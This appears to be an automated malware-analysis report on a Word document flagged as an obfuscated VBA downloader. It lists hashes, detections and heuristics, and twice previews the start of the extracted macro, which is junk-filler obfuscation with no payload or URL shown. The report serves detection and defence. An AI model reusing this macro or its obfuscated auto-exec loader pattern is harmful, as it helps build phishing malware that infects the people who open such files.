Office (OLE) malware analysis — malicious · 82822a6d9b3d52a0

MALICIOUS

Office (OLE)

276.5 KB Created: 2019-10-10 12:17:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: e17da5e8a15e60488592b74c60a0cf9e SHA-1: f960912e8b99eed19bdbd65da4dcae4ca8f70118 SHA-256: 82822a6d9b3d52a07fb3de64bdeefcbe471e2fb5fa06d31452c07a7c0b71c6ad

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function and CreateObject calls, indicative of a downloader. ClamAV detection as 'Doc.Downloader.Generic-7331201-0' further supports this. The obfuscated nature of the VBA code prevents a confident identification of the specific payload or download URL, leading to an 'unknown family' classification.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7331201-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7331201-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 74054 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	74054 bytes
SHA-256: `214ff119089dadfd6c388e39898a21c14efd64ed742278f1e186104ff19ca616`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "cc00112055x8" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "xx0252948xc88, 0, 0, MSForms, TextBox" Attribute VB_Control = "cb790114020, 1, 1, MSForms, TextBox" Attribute VB_Control = "b0c006678b000, 2, 2, MSForms, TextBox" Attribute VB_Control = "bx29c2x53284, 3, 3, MSForms, TextBox" Attribute VB_Control = "b50c90b0800, 4, 4, MSForms, TextBox" Attribute VB_Control = "c6311020b058, 5, 5, MSForms, TextBox" Attribute VB_Name = "b08c1132724b" Function x101x0872006() On Error Resume Next c7212b6xc007c = True 'Forward46131 Mossie Vista, Swaniawskiville, Samoa Direct75818 Toney Isle, New Rahul, Samoa c62410007090 = Round(b0304508040) c5000040x20 = False 'District1697 Brekke Mews, East Dayanaland, Guinea Global93841 Schneider Street, Kossland, Tonga c792620x80870 = Round(x80417050x002) c607810709b2 = True 'Central400 Terrill Lock, Port Tessie, Central African Republic Legacy52360 Houston Meadow, Kirlinburgh, Palestinian Territory x2x7803439c0 = Round(x756012b7c96x) cc38089018bc2 = True 'District2338 Labadie Centers, Port Bransonmouth, Azerbaijan International264 Moore Circles, Mantestad, Burundi b0bb22262c2 = Round(c0b014870bc27) c0x00390500 = True 'Senior5062 Cale Rue, North Jovan, Iceland Forward29106 Kautzer Route, Lennaville, Guinea bx676xb26c00 = Round(b00097x84b313) c048c097796 = True 'Corporate637 Ashton Grove, Huelshire, Venezuela Lead4024 Bosco Ramp, Port Sandraland, Nigeria b9bb28bx6bbc4 = Round(b2290c0c6c49) bbc0b280109 = False 'District5546 Friedrich Route, North Christ, Equatorial Guinea Central55859 Hagenes Union, Hellerside, Germany x0260xbc250 = Round(b77000c01x0c3) bb3x0b9218890 = False 'Forward93262 Vance Valley, Blancatown, Belarus Dynamic11521 Sanford Place, Wisozkhaven, Congo b3230b32b00 = True 'Investor2923 Marion Courts, Jensenmouth, Cape Verde Senior3451 Quentin Viaduct, Martinabury, Northern Mariana Islands c3353b81b0080 = Round(x1c30c470000) x100050214930 = False 'Chief989 Kessler Centers, Heathcoteshire, Jordan Dynamic9487 Beverly Hill, East Tressa, Sudan b8x000076405 = Round(b5c740600006) c8520x520bc = False 'Direct5943 Zackary Road, Aminachester, Central African Republic Dynamic7419 Roma Manors, Felixbury, China b550xb090605 = Round(b0bx4000006) cc7b566033x05 = False 'Direct8044 Kuvalis Flat, East Steve, Niue Investor2323 Lonzo Stravenue, South Bridgette, Northern Mariana Islands cb8010040x9 = Round(c65442063430) x6x20060039 = True 'Investor838 Gutkowski Islands, Lueilwitzport, French Polynesia Direct081 McLaughlin Pass, South Millie, Montserrat x00b980b0073c = Round(b820b060909cx) x9b5805371cx5 = False 'Human024 Ima Canyon, McKenziechester, United States Minor Outlying Islands Global15142 Mohammad Mission, Mossiehaven, Belgium c0496cx02070 = Round(x602x00289x0) c00b12009237b = True 'Internal41554 Theo River, Gloriaton, Niue Principal59605 Beahan Glens, Lake Dillanmouth, Puerto Rico bx03079c94078 = Round(c603b2b6906b0) b905b8c83bx0b = False 'International27205 Adele Spurs, Mullerburgh, Albania Legacy0872 Samantha Lane, Kennediborough, Guatemala x8x21360xc252 = False 'Investor337 Thiel Road, Corneliusville, France Regional086 Graham Groves, Lake Marcos, France b4095x085x4 = Round(c720000094x0) b6x82338x00 = True 'Investor94636 Isom Fields, Rodriguezstad, Pakistan Regional680 Maybelle Crescent, Dorthyberg, Gabon b071071040664 = Round(b000003b43b) x6600060bc125 = True 'Global0916 Elva Path, Port Dawnhaven, Saudi Arabia Investor494 Ratke Hills, Vivienneville, Uganda b6c0310x0x3 = Round(c109c16038065) c973335011b0 = True 'Global8685 Vincenza Plains, East Joanne, Papua New Guinea Dynamic9295 Jakob Garden, Karianneshire, Benin c0406x015b10 = Round(c340041c4x0) b96b5c480390 = False 'Lead4000 Hildegard Divide, New Virgilland, Russian Federation Customer8735 Lynn Forks, Au ... (truncated)

SHA-256: 214ff119089dadfd6c388e39898a21c14efd64ed742278f1e186104ff19ca616

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "cc00112055x8"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "xx0252948xc88, 0, 0, MSForms, TextBox"
Attribute VB_Control = "cb790114020, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b0c006678b000, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bx29c2x53284, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b50c90b0800, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c6311020b058, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b08c1132724b"
Function x101x0872006()
On Error Resume Next
   c7212b6xc007c = True
'Forward46131 Mossie Vista, Swaniawskiville, Samoa Direct75818 Toney Isle, New Rahul, Samoa
c62410007090 = Round(b0304508040)
c5000040x20 = False
'District1697 Brekke Mews, East Dayanaland, Guinea Global93841 Schneider Street, Kossland, Tonga
c792620x80870 = Round(x80417050x002)
c607810709b2 = True
'Central400 Terrill Lock, Port Tessie, Central African Republic Legacy52360 Houston Meadow, Kirlinburgh, Palestinian Territory
x2x7803439c0 = Round(x756012b7c96x)
cc38089018bc2 = True
'District2338 Labadie Centers, Port Bransonmouth, Azerbaijan International264 Moore Circles, Mantestad, Burundi
b0bb22262c2 = Round(c0b014870bc27)
c0x00390500 = True
'Senior5062 Cale Rue, North Jovan, Iceland Forward29106 Kautzer Route, Lennaville, Guinea
bx676xb26c00 = Round(b00097x84b313)
c048c097796 = True
'Corporate637 Ashton Grove, Huelshire, Venezuela Lead4024 Bosco Ramp, Port Sandraland, Nigeria
b9bb28bx6bbc4 = Round(b2290c0c6c49)
bbc0b280109 = False
'District5546 Friedrich Route, North Christ, Equatorial Guinea Central55859 Hagenes Union, Hellerside, Germany
x0260xbc250 = Round(b77000c01x0c3)
bb3x0b9218890 = False
'Forward93262 Vance Valley, Blancatown, Belarus Dynamic11521 Sanford Place, Wisozkhaven, Congo
b3230b32b00 = True
'Investor2923 Marion Courts, Jensenmouth, Cape Verde Senior3451 Quentin Viaduct, Martinabury, Northern Mariana Islands
c3353b81b0080 = Round(x1c30c470000)
x100050214930 = False
'Chief989 Kessler Centers, Heathcoteshire, Jordan Dynamic9487 Beverly Hill, East Tressa, Sudan
b8x000076405 = Round(b5c740600006)
c8520x520bc = False
'Direct5943 Zackary Road, Aminachester, Central African Republic Dynamic7419 Roma Manors, Felixbury, China
b550xb090605 = Round(b0bx4000006)
cc7b566033x05 = False
'Direct8044 Kuvalis Flat, East Steve, Niue Investor2323 Lonzo Stravenue, South Bridgette, Northern Mariana Islands
cb8010040x9 = Round(c65442063430)
x6x20060039 = True
'Investor838 Gutkowski Islands, Lueilwitzport, French Polynesia Direct081 McLaughlin Pass, South Millie, Montserrat
x00b980b0073c = Round(b820b060909cx)
x9b5805371cx5 = False
'Human024 Ima Canyon, McKenziechester, United States Minor Outlying Islands Global15142 Mohammad Mission, Mossiehaven, Belgium
c0496cx02070 = Round(x602x00289x0)
c00b12009237b = True
'Internal41554 Theo River, Gloriaton, Niue Principal59605 Beahan Glens, Lake Dillanmouth, Puerto Rico
bx03079c94078 = Round(c603b2b6906b0)
b905b8c83bx0b = False
'International27205 Adele Spurs, Mullerburgh, Albania Legacy0872 Samantha Lane, Kennediborough, Guatemala
   x8x21360xc252 = False
'Investor337 Thiel Road, Corneliusville, France Regional086 Graham Groves, Lake Marcos, France
b4095x085x4 = Round(c720000094x0)
b6x82338x00 = True
'Investor94636 Isom Fields, Rodriguezstad, Pakistan Regional680 Maybelle Crescent, Dorthyberg, Gabon
b071071040664 = Round(b000003b43b)
x6600060bc125 = True
'Global0916 Elva Path, Port Dawnhaven, Saudi Arabia Investor494 Ratke Hills, Vivienneville, Uganda
b6c0310x0x3 = Round(c109c16038065)
c973335011b0 = True
'Global8685 Vincenza Plains, East Joanne, Papua New Guinea Dynamic9295 Jakob Garden, Karianneshire, Benin
c0406x015b10 = Round(c340041c4x0)
b96b5c480390 = False
'Lead4000 Hildegard Divide, New Virgilland, Russian Federation Customer8735 Lynn Forks, Au
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.